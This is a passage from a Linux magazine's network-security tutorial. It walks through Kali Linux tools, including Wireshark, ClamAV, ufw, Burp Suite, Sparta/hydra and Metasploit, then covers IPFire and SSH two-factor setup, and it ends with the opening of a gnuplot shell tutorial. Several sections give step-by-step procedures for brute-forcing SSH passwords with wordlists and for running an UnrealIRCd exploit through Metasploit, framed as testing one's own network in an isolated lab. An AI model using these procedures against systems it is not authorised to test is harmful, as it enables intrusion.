any tools listed here should be run from within a pen-testing distribution of Linux, such as Kali, wherever possible. Before proceeding, make sure you have followed other basic InfoSec best practices, too. Do your network devices have any preinstalled accounts with default passwords that a hacker could exploit? Do the accounts you have installed all require admin privileges to make system-wide changes? Finally, make sure you are aware of where your server’s log files are located. Usually they can be found in /var/log. These can be invaluable when simulating an attack on your network.


Integrity

Integrity involves ensuring data is consistent and accurate, both when stored and transmitted. Simpler ways of ensuring this involve setting file permissions and user access controls. More advanced methods may involve the use of cryptographic checksums such as MD5 to produce a hash value of a new document to compare to the previous copy. Integrity also encompasses running and maintaining backups of all important data. This is crucial to protect against data loss caused by factors other than unscrupulous hackers, such as a server crashing due to an update or a hardware fault.
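The checksum approach described above can be sketched in a couple of commands; the file name and contents here are arbitrary examples:

```shell
# Record a baseline hash for a document
printf 'quarterly figures\n' > report.txt
md5sum report.txt > report.txt.md5

# Later, verify the stored copy is unchanged (prints "report.txt: OK")
md5sum -c report.txt.md5

# Any modification makes the check fail
echo 'tampered' >> report.txt
md5sum -c report.txt.md5 || echo 'integrity check failed'
```

The same pattern works with sha256sum if you prefer a stronger hash function.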

Availability

Availability focuses on making sure that data is accessible at all times, regardless of outside influences like hacking or natural disasters. This may involve using RAID drives to make sure there are several copies, or storing backups on a separate site to make them easier to restore. Availability is better ensured by keeping all software up to date, as well as making sure hardware repairs are carried out rapidly. For data stored on servers, availability also involves providing enough bandwidth to all users to avoid slowdown caused by bottlenecks.




PEN-TEST YOUR NETWORK WITH KALI LINUX

The ultimate Swiss Army knife of ethical hackers

The most popular pen-testing distro by far is Kali Linux, the full version of which is available on the cover DVD. When booting, choose Kali’s live mode for now. The default username is root, and its password is toor. On first boot you will also be asked whether you want to use the default configuration (four desktops) or just one. Choose accordingly to load the desktop. Click the Applications menu to find that the tools have been neatly categorised for you. For instance, the awesome network tool nmap can be found under Information

Gathering. Do not be alarmed if the same tool is listed twice under separate categories. By way of example, nmap is listed both under Information Gathering and Vulnerability Analysis, as it’s useful for both. As time goes on, you may wish to install additional tools and customise the Kali desktop to your liking. If this is the case, consider installing Kali to a USB stick with persistence. This option is available from the Boot Screen. If you only have access to your target device, consider running Kali in a virtual machine or

even installing to an inexpensive Raspberry Pi computer in order to keep it separate from your personal data. Virtual disk and ‘armhf’ images are available from the Kali website. Once installed, follow the developers’ instructions on how to tweak the Kali desktop, as well as how to upgrade. Many of the tools you will explore in Kali do not have a GUI. Nevertheless, they are simple to use, and by default Kali will load the man page of each one to show you all available commands.


WATCH LIVE TRAFFIC AND DATA WITH WIRESHARK

The definitive network protocol analyser

Wireshark is one of the best-known network analysis tools. It is capable of analysing live traffic as well as data captured to disk. Wireshark can be launched from the Sniffing and Spoofing category in the Applications menu in Kali Linux. Wireshark has many uses. Chief among these: should malware make it onto your network, you will be able to analyse malicious files as they enter, and also find out what data (if any) was successfully stolen. At first the display can seem very garbled, as it will show all data packets. Click the filter bar at the top to pare this down. To start, enter http.request.full_uri to see HTTP requests. Display filters can be daisy-chained; for example:

http.request.full_uri || ssl.handshake.certificate || dns

If you regularly use the same search criteria, go to the Analyze>Filter Display Macros menu to set up a shortcut. A full list of display filters is available on the Wireshark website. Right-click any packets of interest and choose Follow>TCP Stream to find out more.
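Display filters can also exclude traffic you already trust. For instance, the following filter (a hypothetical example) hides your own SSH session while still showing web and DNS activity:

```
not tcp.port == 22 and (http or dns)
```

Operators such as `not`, `and` and `or` combine freely with the `||`/`&&` forms shown above.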

Go to File>Save As to choose which packets to save and in what format. These can be opened later in Wireshark and other tools such as Kismet (featured later) for analysis.

The full user guide for Wireshark is available as a PDF from: user-guide-a4.pdf


Check individual files or multiple emails with this powerful antivirus scanner

Although Linux systems cannot be affected by Windows malware, by default they will happily forward malicious files on, via the internet or USB, to more vulnerable machines. ClamAV is an excellent FOSS (free and open source software) antivirus toolkit. Its database is updated every few hours and its detection rate beats that of many commercial scanners. In Kali, run:

apt-get install clamav clamav-update clamdscan clamav-daemon

…to install the necessary files. You can use the command freshclam to update the virus database manually, but it’s far better to schedule this as a cron job. Run the command:

clamdscan -i <filename>

…to scan individual files or folders. The ClamAV daemon will launch automatically once installed, but is not a real-time scanner in that it will not check files as they are written. The application ClamFS, however, can be used to automate checks of folders such as Downloads. Visit the ClamFS project page for more information.
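The cron job mentioned above might look like the following; the six-hour schedule and the path to freshclam are arbitrary examples and may need adjusting for your system:

```shell
# Hypothetical /etc/cron.d/freshclam entry: update signatures every six hours
0 */6 * * * root /usr/bin/freshclam --quiet
```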

ClamAV is most commonly used on mail servers running Postfix to prevent the sending of malware and phishing emails, through installing the additional program ClamSMTP. After installation, the ClamAV .conf files need to be updated to reflect the ports used by Postfix. This is to make sure all mail is scanned. Visit the developer page for full instructions.





Protect your ports with a few quick commands

Ufw (Uncomplicated Firewall) and its graphical companion Gufw serve as front-ends for the iptables firewall that is standard in most distributions of Linux. Run the following command:

apt-get install ufw gufw

…in Kali to explore further. Gufw is self-explanatory and comes with a switch to enable the firewall, and wizards to block or allow certain ports. There are even preset configurations to allow certain applications and games, such as Call of Duty. The command-line version is almost as easy to use. Run:

ufw enable

Then to check firewall status, run:

ufw status verbose

By default, all outgoing connections are enabled and all incoming are disabled. You can enable connections with a single command citing the port and protocol. For example, if running a Minecraft server, allow incoming TCP traffic with:

ufw allow 25565/tcp

Services such as SSH use the following syntax:

ufw allow ssh

To disable ports or services, replace ‘allow’ with ‘deny’.

Ufw comes pre-installed on Ubuntu and certain other Debian-based distros, but is not ideal for RPM-based ones. For a true cross-platform solution, consider running a dedicated firewall distro such as IPFire (featured later).



Lock down your web applications

Burp Suite is an integrated platform for analysing and attacking web applications. The free version, which comes pre-installed in Kali, is likely to meet most admins’ needs. Burp Suite contains an intercepting proxy, which will run on startup on port 8080. This allows you to shunt any browser traffic through it for analysis. Make a request in your web app for the proxy to intercept it. Head over to the Target tab if you wish to view a site map.


From inside the Target tab, find your web application and then right-click one of your nodes. Select the ‘spider from here’ option to make sure there are no links to sensitive resources like databases that hackers might be able to exploit. Back in the Proxy tab, click the Action button, then Send to Intruder to pass intercepted traffic to Burp Suite Intruder. This allows you to automate an attack against one of your web

applications, such as trying to brute-force a user’s password. Click the Intruder tab and then Positions to configure the request template as well as the attack type. The Payloads tab allows you to choose specific payload sets. Click the Start Attack button when ready. For a complete rundown of all Burp Suite’s features, visit the developer’s support site.

TEST YOUR NETWORK WITH SPARTA

A handy Python GUI for nmap and hydra – this is Sparta

Sparta, which comes pre-installed in Kali, serves as a front-end for the awesome nmap and Nikto tools, among others, making network enumeration much easier. Upon launch, Sparta will ask you to specify a range of IP addresses to scan. Once the scan is complete, Sparta will identify any machines, as well as any open ports or running services. Where possible, it will also list the OS in the Information tab. If ports 80 or 443 are open, Sparta will also have Nikto run a scan. Nikto essentially checks server software to make sure it’s up to date, as well as ensuring that there are no potentially harmful files or programs. Use the Nikto tab to view the results and the Notes tab to record

your progress. Sparta also incorporates the ‘hydra’ tool, which can be used to brute-force remote authentication services such as SSH. Besides specifying the IP, port and service of the remote host, you’ll need to link to a password list. Kali

includes the ‘rockyou’ list containing thousands of the most commonly used passwords. If you want to test Sparta safely, consider using the Metasploitable virtual machine (featured later), which intentionally includes vulnerabilities.


Add hosts

Launch Sparta in Kali by going to Applications>Vulnerability Analysis>Sparta. When the window launches, select ‘Click here to add host(s) to scope’. A pop-up will appear asking you to specify an IP range. You can add a single IP address if you already know the host you wish to scan, or specify an entire subnet. Click Add to Scope to begin the scan. If you’re checking several hosts, right-click each as you go and select Mark as Checked to omit them from future scans.

Gather host information

Hosts are listed in the left-hand pane. Click on each to see open ports in the Services tab. The layout is very clear. Numbered ports are listed under Port and the type of service in question, such as SSH or FTP, is listed under Name. Use the Information tab to see the total number of open ports. Sparta also uses OS fingerprinting to determine the host’s operating system, but this is not always accurate. Use the Notes tab at this stage to record any observations you’ve made so far.

Check Nikto scan

This step is optional but recommended. Nikto will automatically scan ports 80 or 443 if it finds them open. Click on the Nikto tab to see the results of the scan. The results can be quite convoluted, so it pays to break them down by section. The ‘SSL info’ section in the screenshot, for instance, shows that the default HTTPS certificate used in devices running Broadcom firmware is installed. This certificate is installed on over 480,000 devices, so needs to be updated. Other alerts, such as ‘No CGI Directories found’, are more self-explanatory. Some may be prefixed with OSVDB- followed by a number. These are Open Source Vulnerability Database designations. Search for further information on individual vulnerabilities.

Select service to brute-force

If you wish to test the strength of passwords on a remote host, click on the Services tab and then right-click on the name of the service you wish to attack, such as SSH. Click ‘Send to Brute’ to specify the IP, port and service you wish to crack. Next, click on the Brute tab and check these are correct.

Prepare your brute-force attack

Once you have clicked on the Brute tab, examine the default options. These are checked so that hydra will look for obvious vulnerabilities, such as a blank password or a password that’s identical to a username. Below this, you can specify a username and/or password manually or choose from a list. Click the Browse button to view the /usr/share/wordlists folder. Extract rockyou.txt.gz to try some of the most common passwords. Alternatively, use the password list from John the Ripper located in /usr/share/john/password.lst, or search for lists online.

Launch the brute-force attack

Click Run to begin brute-forcing the password of your chosen host. Pay careful attention to the warning message in the pane below. If you haven’t specified a username or password, this will display below. The Threads option at the top-right limits the number of parallel tasks hydra will try to carry out. If you are connecting via SSH, Sparta will warn you that servers usually support a maximum of four. Click Stop at any time to reconfigure before launching the attack again.
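To see what a dictionary attack like hydra’s is doing under the bonnet, here is a minimal, self-contained sketch that tries wordlist entries against a stored password hash. It is purely illustrative: the tiny wordlist and the ‘dragon’ password are made up, and this is not how hydra itself is invoked:

```shell
# The "unknown" password, stored only as a SHA-256 hash
target_hash=$(printf '%s' 'dragon' | sha256sum | cut -d' ' -f1)

# A tiny wordlist standing in for rockyou.txt
printf '%s\n' 123456 letmein dragon qwerty > wordlist.txt

# Try each candidate until one hashes to the stored value
found=""
while read -r candidate; do
  if [ "$(printf '%s' "$candidate" | sha256sum | cut -d' ' -f1)" = "$target_hash" ]; then
    found=$candidate
    echo "Password recovered: $found"
    break
  fi
done < wordlist.txt
```

Against a live service, each guess is a network login attempt rather than a local hash comparison, which is why hydra throttles parallel threads.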




USE THE METASPLOIT FRAMEWORK

Test your server against thousands of exploits

The free version of Metasploit Framework (often shortened to ‘msf’) is bundled with Kali Linux. Msf is an open source framework for identifying vulnerabilities, as well as developing and running exploit code. Kali also comes with the excellent program Armitage, which serves as a GUI for msf. The commercial versions also have a web GUI, but when taking your first tentative steps with the framework, the command-line utility is less overwhelming. Rapid7, the developer of msf, has also created Metasploitable 2, a virtual machine which intentionally contains a number of vulnerabilities that can be exploited by msf, and which you can use for the purposes of this tutorial. Kali has a built-in command-line tool, searchsploit, which can be accessed from within msf once a vulnerable port/service has been detected. For a more visually appealing,


categorised view, visit Offensive Security’s online exploit database. Once an exploit has been loaded, you can configure it further with the command show options.

The final step is to run the exploit to discover whether your server is vulnerable to this particular attack. Msf will inform you one way or the other and save the results to its database.

Launch Metasploit Framework

Launch msf from within Kali by clicking Applications>Exploitation Tools>Metasploit. As with other security tools, you may find msf in more than one category, as it can be used in various ways. If you are using the Metasploitable 2 virtual machine in VirtualBox, which is highly recommended, make sure to create a host-only network to which both the Kali and Metasploitable machines are connected. This will prevent either machine from connecting to the real network or the internet.



Identify remote hosts

This step simply involves identifying the remote host you wish to exploit through the use of nmap. If you wish, you can use Sparta’s GUI to do this. Alternatively, you can use nmap from the msf command line in the following format:

nmap -v address

For instance:

nmap -v <target IP>

If you wish to scan an entire subnet, use the ‘*’ wildcard. For example:

nmap -v 192.168.0.*


Choose your exploit

The nmap utility or Sparta will list all open ports on your remote host. The next step is to determine whether any of the services running on these ports is vulnerable to an exploit. The easiest way to do this from within msf is to use the searchsploit command. However, running searchsploit irc will show potential exploits for every version of every IRC program. You can narrow this down by scanning the specific port in question to determine the software version. For instance, if you want to


see if the IRC software running on port 6667 on a host is vulnerable, run the following command:

nmap -A -p 6667 <target IP>

In Metasploitable 2, this shows more useful information. The machine is running v3.2.8.1 of the Unreal IRC daemon. Running searchsploit unreal irc shows there are two possible exploits for this version of Unreal on Linux. The paths are provided on the right.

Move exploit

Having identified the exploit you wish to use, it must be moved into Metasploit’s modules folder (~/.msf4/modules). The easiest way to do this is to open a new Terminal and use the mkdir command to create a directory named exploits. Feel free to create subdirectories inside exploits to help organise them. For instance:

cd ~/.msf4/modules
mkdir -p exploits/linux/remote

Next, use the mv command to place the exploit where msf can see it. For example:

mv /usr/share/exploitdb/platforms/linux/remote/16922.rb ~/.msf4/modules/exploits/linux/remote/16922.rb

Either restart msf or use the command reload_all to update.

Load exploit

Once msf has restarted or reloaded, load your exploit with the syntax:

use exploit/path/to/exploit

For instance, in the case of the IRC exploit listed previously, type:

use exploit/linux/remote/16922

Note that there is no need to include the file extension. Exploits are written in various programming languages, but msf can recognise these automatically.

Configure parameters and run

Once the exploit has been loaded, you can type show payloads and show options to configure the tool further. When typing the latter, you will be asked to ‘set RHOST’. This is where you specify the IP address of the remote host. For instance:

set RHOST <target IP>

If you wish to choose a specific payload, use the same syntax:

set PAYLOAD <payload>

Finally, run your exploit with the command:

exploit

The final step is to run the exploit to discover whether your server is vulnerable to this particular attack. Msf will inform you one way or the other and save the results to its database.





A handy utility to detect rogue wireless access points passively

Unsecured wireless access points as well as ad-hoc networks can cause interference with legitimate Wi-Fi areas. They are also potentially an easy way to access passwords and other sensitive data on devices that have not been properly locked down.

Kismet, which comes pre-installed in Kali, is a wireless network detector built along similar lines to Netstumbler for Windows. One important difference is that it scans passively, so can discover hidden Wi-Fi networks. While it is commonly used for 'wardriving', it is also an enormously useful tool for security admins to make sure no unauthorised devices in your organisation are set up as an access point.

Ideally Kismet needs a dedicated Wi-Fi card, which it will place into monitoring mode to detect Wi-Fi points nearby. This will allow your device to stay connected to the internet while Kismet is working. Kismet supports GPS devices. By default the program can be configured to show your device's current location, but through use of add-ons it can also plot the likely location of other Wi-Fi networks on maps, making it easier to trace their exact location.

KISMET MENUS The Kismet menu allows you to view the Kismet console or add a new interface for scanning. Use the Sort menu to change how networks are displayed

NETWORK AND CLIENT LIST The Network List displays any wireless networks in range. Hidden networks are listed as ‘<Hidden SSID>’. Clients’ MAC addresses are listed below. Use arrow keys to scroll up and down

GENERAL INFO Here Kismet displays information such as detection of new networks and when log files have been saved. The current wireless interface is also shown at the bottom-right


Install and launch Kismet

If you are using Kali, Kismet is preinstalled and can be launched from the Terminal with the command kismet. Otherwise download it from your local repository. Kismet requires root privileges to perform some functions. This carries a risk of bugs or exploits damaging your system. In Kali, where you work as root by default, this shouldn't be an issue as it is designed with security in mind. For other distributions, consider installing Kismet with the setuid bit set, which grants root privileges only to those processes that need them.

Configure startup options

On the first run, Kismet will ask you to choose your text colour. Click Next to automatically start Kismet Server. The Startup Options window will appear, where you can configure any startup parameters such as logging. By default, logs are saved to your home folder. Click Start when you are ready to continue.

Add a source

Next you will see a message stating that Kismet started with no sources defined. Click Yes to choose to add a source now. The 'add source' window will now appear. Use the command ip link show or ifconfig in the Kali Terminal to display the names of your network interfaces (such as 'wlan0') and enter one here. You can also set a name if you wish. Click 'Add' when you are done. Kismet will launch and immediately begin to list networks and clients.

Set up GPS

This step is optional but highly recommended for hunting down rogue Wi-Fi networks. You will need an external GPS device to be connected to your device. In Kali, run:

sudo apt-get install gpsd gpsd-clients

…to install the necessary software. Next, connect the GPS dongle and run dmesg | tail -n 5 to determine where it is mounted, such as /dev/ttyUSB0. Start the GPS device with gpsd <device location>. For instance:

gpsd /dev/ttyUSB0

Finally, edit /etc/kismet/kismet.conf and uncomment both the lines 'gpstype=serial' and 'gpsdevice=/dev/rfcomm0' by removing the hash (#) at the start. Amend '/dev/rfcomm0' to the actual location of your GPS device. Restart Kismet to see your current GPS co-ordinates.
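The two kismet.conf edits can be scripted with sed instead of done by hand. A sketch that operates on a stand-in copy of the file so nothing under /etc is touched; the gpstype/gpsdevice lines mirror the ones named above, and /dev/ttyUSB0 is the example device location:

```shell
#!/bin/bash
# Uncomment the GPS lines in a copy of kismet.conf and point them at our device.
conf=$(mktemp)
printf '#gpstype=serial\n#gpsdevice=/dev/rfcomm0\n' > "$conf"

sed -i 's|^#gpstype=serial|gpstype=serial|' "$conf"
sed -i 's|^#gpsdevice=/dev/rfcomm0|gpsdevice=/dev/ttyUSB0|' "$conf"

cat "$conf"   # both lines now active, device path amended
```

On a real system you would run the same two sed commands against /etc/kismet/kismet.conf (as root) and then restart Kismet.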

TEST WITH METASPLOITABLE 2 Practise pen-testing safely with a virtual machine

Metasploitable is not an application but a virtual machine image based on Ubuntu Linux, which contains a number of intentional vulnerabilities. This can be used to safely test security tools such as Sparta and the Metasploit Framework. The image itself can be downloaded online (or found on the cover disc). You will need virtual machine software such as VirtualBox to run it.

The easiest and safest way to pen-test Metasploitable is to run Kali in a virtual machine. VirtualBox can create a host-only network that will allow Kali and Metasploitable to see one another without being exposed to the rest of your network or the internet. First go to File>Preferences>Network>Host Only Network>Add to create a new network. Next, inside each virtual machine, click Settings>Network and choose Host Only Adapter in the drop-down 'Attached To' menu. The name should populate automatically with the host-only network you created. Under Advanced, set Promiscuous Mode to Allow All.

The default username and password for the virtual machine is msfadmin. A full video tutorial showing how to set up Metasploitable 2 in VirtualBox is available on the Rapid7 website.



Secure passwords in a multi-user environment with an easy-to-manage database

SysPass is a web password manager written in PHP. Its chief advantage is that it is very lightweight, using an HTML5 and AJAX interface. The database is protected by a master password, and individual user accounts and passcodes are encrypted with AES-256 CBC. SysPass will run on any server using Apache, PHP and MySQL, and is even designed to be run from a portable flash drive for extra security.

Once installed, users log in to the interface with their own username and password, which is not shared with others. Any users in your organisation who previously used a personal password database with KeePass can easily migrate their accounts to SysPass. Multiple users can also be added to groups; for instance, all the administrators of a particular website can access the username and password to connect via FTP. Users that are 'Application Admin' or 'Account Admin' can view, modify and delete any account. They do this through use of a master password that is required each time global changes, such as adding a new user, are made.

A demonstration of SysPass's colourful and simple web interface is available online (use the default passwords shown), along with setup instructions.



Lock down your system

PROTECT NETWORKS WITH IPFIRE
Quickly set up a highly customisable firewall for all your networks

IPFire is an open source firewall Linux distribution. This is an oversimplification, however, as it offers a number of other features such as intrusion detection and support for OpenVPN. IPFire takes a serious approach to security through using an SPI (stateful packet inspection) firewall built on top of netfilter.

The setup process allows you to configure your network into different security segments. Each segment is colour-coded. For instance, the green segment is a safe area representing all regular clients connected to the local wired network. The red segment represents the internet. No traffic can pass from red to any of the other segments unless specifically configured in the firewall. The default setup is for a device with two network cards, with a red and green segment only. However, during the setup process you can also set up a blue segment for wireless and an orange one known as the 'DMZ' for any public servers.

Once setup is complete, you can configure additional options and add-ons through an intuitive web interface. IPFire is specifically designed for people without large amounts of networking experience and can be deployed in minutes.



Download and install IPFire ISO

Visit the IPFire site to download the 162MB ISO of IPFire (or get it from the cover disc). The default hardware requirements are very minimal. Click on Other Download Options to obtain flash images as well as versions compiled for ARM architectures. The IPFire site cautions that the software doesn't run well on devices like the Raspberry Pi, nor does it make use of the hardware random number generator. Consider having a dedicated server for IPFire or running it inside a virtual machine.



Run IPFire setup

The initial setup process is very simple. Select your language and use the space bar to indicate you’ve accepted the terms of the GNU licence. You will then see a notification saying that the system has been installed. The device will restart, at which point you will be asked to select your time zone. Next, you will be asked to select a root password to access the IPFire command line, as well as an admin password for accessing the web interface later on.


Choose network configuration type

Having chosen a host name and local domain settings, you will be taken to the Network Configuration menu. As outlined previously, the default settings are ‘GREEN + RED’. These represent devices with Ethernet attached. If you wish to set up wireless (blue) or a public server (orange-DMZ), select the ‘Network Configuration type’ option, then use the arrow keys to select a different setup. You can change these options post-install but as IPFire cautions, a network restart is required, as well as reassignment of drivers (see Step 4).


Choose driver assignments

Next, in the Network Configuration menu, choose Drivers and Card Assignments. You will now see the Extended Network menu. Select Green in the first instance. The menu will ask you to choose the network card for this interface. If you are unsure which to choose, click Identify and the lights on the port in question will flash for ten seconds.


Set network addresses

Select Address Settings from within the Network Configuration menu. You will then be asked to select the interface in question. Green allows you to assign any valid IP address for a private network here. There are more options for the Red interface, which may vary depending on your ISP. If you do choose to assign a static IP, assign it to a different subnet. For example, if green is 192.168.0.X, red could be 192.168.2.X. If you are unsure, choose DHCP.
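The "different subnet" rule above is easy to check mechanically: for the /24 networks in the example, the first three octets of the two addresses must differ. A small illustrative sketch; the concrete host addresses are made-up instances of the 192.168.0.X and 192.168.2.X ranges from the text:

```shell
#!/bin/bash
# Compare the /24 network prefix of two IPv4 addresses.
prefix24() { echo "$1" | cut -d. -f1-3; }

green=192.168.0.1   # example green-interface address
red=192.168.2.1     # example static red-interface address

if [ "$(prefix24 "$green")" = "$(prefix24 "$red")" ]; then
  echo "same /24 subnet - pick a different range for red"
else
  echo "different /24 subnets - OK"
fi
```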


Configure DNS and gateway

Back in the Network Configuration menu, choose DNS and Gateway Settings. If you chose DHCP when configuring the Red interface, your ISP’s DNS servers will be used by default and you do not have to configure this further. If you chose a static IP or wish to use a different DNS server such as OpenDNS, enter them here, leaving the Gateway field blank for now. A full list of public DNS servers is available from:


Configure DHCP server

Click on Done on the Network Configuration menu to configure the DHCP server for the Green interface. Use the space bar to enable it, and then specify your desired range of addresses within the same subnet as your green interface. Note that the 'Primary DNS' address is the same as the IP address of your green interface. This is because IPFire uses a DNS proxy. Leave this as is for now.


Open web interface

Once setup is complete, IPFire will restart and load the firewall. You will see the IPFire console. Log in as root with the password you previously chose if you wish, then run ifconfig to check that your interfaces are in order. You can access the web interface from any device connected to the network by opening your web browser and entering https://ipfire.localdomain:444. As IPFire uses a self-signed certificate, you may need to confirm a security exception. Enter the username admin and the password you chose previously to display the web interface.

Configure firewall

The web interface is easy to follow. Take some time to work through it to use IPFire's Intrusion Detection System or set up a VPN. For now, click Firewall>Firewall Rules>New Rule. The layout is fairly easy to follow. For instance, if you wish to block all external DNS servers to prevent DNS hijacking, select GREEN in the Standard Networks menu to indicate that clients should use only IPFire's DNS proxy. Choose RED in the same menu in the Destination section. Finally, under Protocol select DNS and make sure REJECT is highlighted. For a full rundown of the various configurations, consult IPFire's firewall documentation at configuration/firewall/start.



Lock down your system


Secure your SSH connections with minimal fuss through two-step verification

For system administrators, connecting to servers via SSH is part of a daily routine for running updates and modifying files, but this can leave the system open to exploitation. While you can reduce the chance of this happening by following some SSH best practices, such as disabling root log-on, changing the default SSH port and using long passwords, the previously mentioned tools (Sparta in particular) demonstrate how easily vulnerable ports can be scanned and how passwords can be brute-forced. Even using programs like fail2ban to limit unsuccessful login attempts or to ban certain IPs for a certain amount of time is no magic bullet, as many exploitation tools can perform several parallel tasks.

The security of your SSH server can be hugely increased through Google Authenticator. This application uses two-step verification based on a TOTP (time-based one-time password) algorithm. The authenticator works in tandem with a mobile app, providing six- to eight-digit one-time passwords that are required in addition to a username and password. Note that our guide assumes you are using OpenSSH server, which is the standard for almost all versions of Linux.

Installation

For Debian-based servers, run:

apt-get install libpam-google-authenticator libpam0g-dev

…to install the authenticator and related software from the repositories. Red Hat, Fedora and CentOS users should run:

yum install pam-devel google-authenticator

If Google Authenticator doesn't exist in your distribution's repositories, you can download and compile it with the make command. PAM (pluggable authentication module) must also be downloaded and compiled. Consider installing the 'ntp' daemon if you have not done so already to ensure the system time is correct, as the Authenticator uses time-based codes.



Generate private key

To begin, run the google-authenticator command. Press 'y' to indicate you wish authentication tokens to be time-based. Next, the authenticator will display information about your secret key, along with a QR code which you can scan using the mobile app. You will also see emergency 'scratch' codes, which can be used to log in if you ever cannot access your mobile device. Write down this information in a safe place before continuing, then press 'y' to update your home folder.


Finalise Google Authenticator preferences

The authenticator will next ask if you wish to disallow multiple uses of the same authentication token. As the authenticator states, selecting this makes man-in-the-middle attacks much harder. You can increase the 30-second period for which tokens are valid in the next step if you wish. Finally, if you do not already have any programs such as fail2ban installed to prevent brute-force attacks, consider pressing ‘y’ to enable rate limiting. This limits attackers to no more than three login attempts every 30 seconds.
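The rate-limiting option works along the lines of a sliding window: no more than three attempts are accepted within any 30-second span. A toy bash sketch of that policy; timestamps are passed in explicitly so the logic is easy to follow, and this is an illustration of the idea, not Google Authenticator's actual implementation:

```shell
#!/bin/bash
# Toy sliding-window rate limiter: at most 3 attempts per 30 seconds.
ATTEMPTS=()

allow_attempt() {            # $1 = attempt time in seconds
  local now=$1 t
  local recent=()
  for t in "${ATTEMPTS[@]}"; do
    (( now - t < 30 )) && recent+=("$t")   # keep attempts still in the window
  done
  ATTEMPTS=("${recent[@]}")
  (( ${#ATTEMPTS[@]} < 3 )) || return 1    # window full: reject
  ATTEMPTS+=("$now")                       # record the accepted attempt
}

allow_attempt 0  && echo "attempt 1 allowed"
allow_attempt 5  && echo "attempt 2 allowed"
allow_attempt 10 && echo "attempt 3 allowed"
allow_attempt 15 || echo "attempt 4 rejected"
allow_attempt 40 && echo "attempt 5 allowed (window expired)"
```

Note that rejected attempts are not recorded, so an attacker hammering the server still only gets three tries per window.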


Configure SSH to use Google Authenticator

Open the /etc/ssh/sshd_config file in a text editor. Scroll down to find the line that reads 'ChallengeResponseAuthentication no' and change it to 'ChallengeResponseAuthentication yes'. Save the file. Next, edit the file /etc/pam.d/sshd and add the following line at the very bottom:

auth required pam_google_authenticator.so

You must now restart the SSH service to apply the new changes. Run /etc/init.d/sshd restart to do this. If your SSH server is not already running, use service sshd start.
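The two edits above can also be scripted. A sketch using sed on stand-in copies of the files in a scratch directory, so nothing under the live /etc is modified; the file contents are abridged examples:

```shell
#!/bin/bash
# Apply the two Google Authenticator edits to copies of the config files.
dir=$(mktemp -d)

# Stand-in sshd_config and PAM file (contents abridged).
printf 'Port 22\nChallengeResponseAuthentication no\n' > "$dir/sshd_config"
printf '@include common-auth\n' > "$dir/sshd"

# 1. Flip ChallengeResponseAuthentication from no to yes.
sed -i 's/^ChallengeResponseAuthentication no/ChallengeResponseAuthentication yes/' \
  "$dir/sshd_config"

# 2. Append the PAM module line at the very bottom.
echo 'auth required pam_google_authenticator.so' >> "$dir/sshd"

grep ChallengeResponse "$dir/sshd_config"
tail -n 1 "$dir/sshd"
```

On a real server, point the same commands at /etc/ssh/sshd_config and /etc/pam.d/sshd (as root) and then restart the SSH service.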


Set up mobile Authenticator app

Using your smartphone or other portable device, visit the Google Play or iTunes Store and install either the official Google Authenticator app or one of its variants such as FreeOTP, which is maintained by Red Hat. The Google Authenticator app for Android is closed source, so from a security perspective FreeOTP is better. Either scan in the QR code generated earlier or manually add the 'secret key'. The tokens are time-based. If you manually add the key in FreeOTP under the Provisioning section, simply enter user@IPaddress in the ID section. In Google Authenticator you would enter this under Account Name.

Test login via SSH

Once your mobile app has been set up, you will see time-based six-digit codes being generated. On a separate device, open Terminal and run ssh user@yourIP. If this is the first time you are connecting via SSH to the server, type 'yes' to verify the key fingerprint. You will be asked to type your password in the usual way. Next, the system will ask for your six-digit verification code. Enter this to log in to the server. Switch users and repeat these steps for any additional users who wish to log in via SSH.

Back up your private keys

Although you have written down your private keys and scratch codes in a safe place, for peace of mind, consider using the cp command to copy your Google Authenticator file in ~/.google_authenticator to a secure medium. For security reasons, Google Authenticator has no way of regenerating the QR code with your private key after it is run for the first time. Install the program 'qrencode' to generate a picture you can open on another device. Once installed, the image can be created with the following command:

qrencode -o qrcode.png 'otpauth://totp/?secret=MVJECJJWSRB3HWIZR4IFUGFTMXBOZ&issuer=ACME&algorithm=SHA1&digits=6&period=30'

Replace 'ACME' and the secret key with your own data.

Require two-factor authentication for console login

This step is optional but can be used to secure logins via the console on the server itself. In your favourite text editor, simply open /etc/pam.d/login and add the same line at the bottom as you did in the SSH configuration:

auth required pam_google_authenticator.so

Bear in mind that if an attacker can physically access your machine, they may target the root account or install a hardware keylogger, so this will not be as effective as controlling physical access to the server in the first place.

Bypass two-step verification for the local network

If you find it tiresome having to provide the verification code when connecting over the local network, configure Google Authenticator to ignore these addresses. Edit the file /etc/pam.d/sshd and replace the following line:

auth required pam_google_authenticator.so

with this:

auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access.conf
auth required pam_google_authenticator.so nullok

Next, edit /etc/security/access.conf and add the following lines:

# Two-factor can be skipped on local network
+ : ALL :
+ : ALL : LOCAL
- : ALL : ALL

Replace the empty field in the first line with your desired range of IP addresses.







Tam Hanna started to develop a strange liking for fancy-looking diagrams when he cobbled together a primitive digital phosphor-like persistence feature for a DS-6612 oscilloscope. Ever since, he has tried to find ways to make information more accessible.

Bash masterclass


Combine shell scripts and charts

Transform your textual information into attractive diagrams using the awesome power of gnuplot

Resources

Bash
gnuplot

Tutorial files available:


Tim van Beveren's research into air safety incidents raised a deeply uncomfortable fact: humans are less suited to processing text and perform much better when provided with graphical input. This is especially important when aircraft systems display information as a series of numbers that are not coloured or marked up with additional visual information like an underlying bar chart.

Even though the average system script – process computers will not be discussed in this tutorial – is not as critical as a wrong decision by a pilot, providing users with large blocks of text is not particularly economical and leads to errors that could be avoided. Fortunately, creating graphics from a shell script is not a difficult task. The gnuplot program, which has been part of all kinds of UNIX distributions for an age and a half, provides a variety of interesting graphing options and should be well known to anybody who frequents the Linux terminal. It thus makes for a more than fitting final instalment of our trip through the fascinating realm of shell programming.

As gnuplot is not exactly something that gets used every day, most distributions do not include it by default. Fortunately, installing it can be accomplished easily via the apt-get command:

~$ sudo apt-get install gnuplot
[sudo] password for [username]:

. . .

The basic package contains only local rendering logic. Displaying data can be accomplished by installing either the Qt or the X11 package – your author swears by the following utility:

~$ sudo apt-get install gnuplot-qt
Reading package lists... Done
. . .

After this, gnuplot can be started in interactive mode by entering its name into a terminal window. The first invocation of gnuplot looks like this:

~$ gnuplot
G N U P L O T
. . .
Terminal type set to 'wxt'

By default, gnuplot starts out with its graphing terminal option set to wxt: it implies that a pop-up window will be displayed whenever there is something to graph. Our first example uses the plot command, which takes one or more functions which then get shown:

Figure 1

Above gnuplot can be used to plot commonly used mathematical functions

~$ gnuplot
G N U P L O T
. . .
Terminal type set to 'wxt'
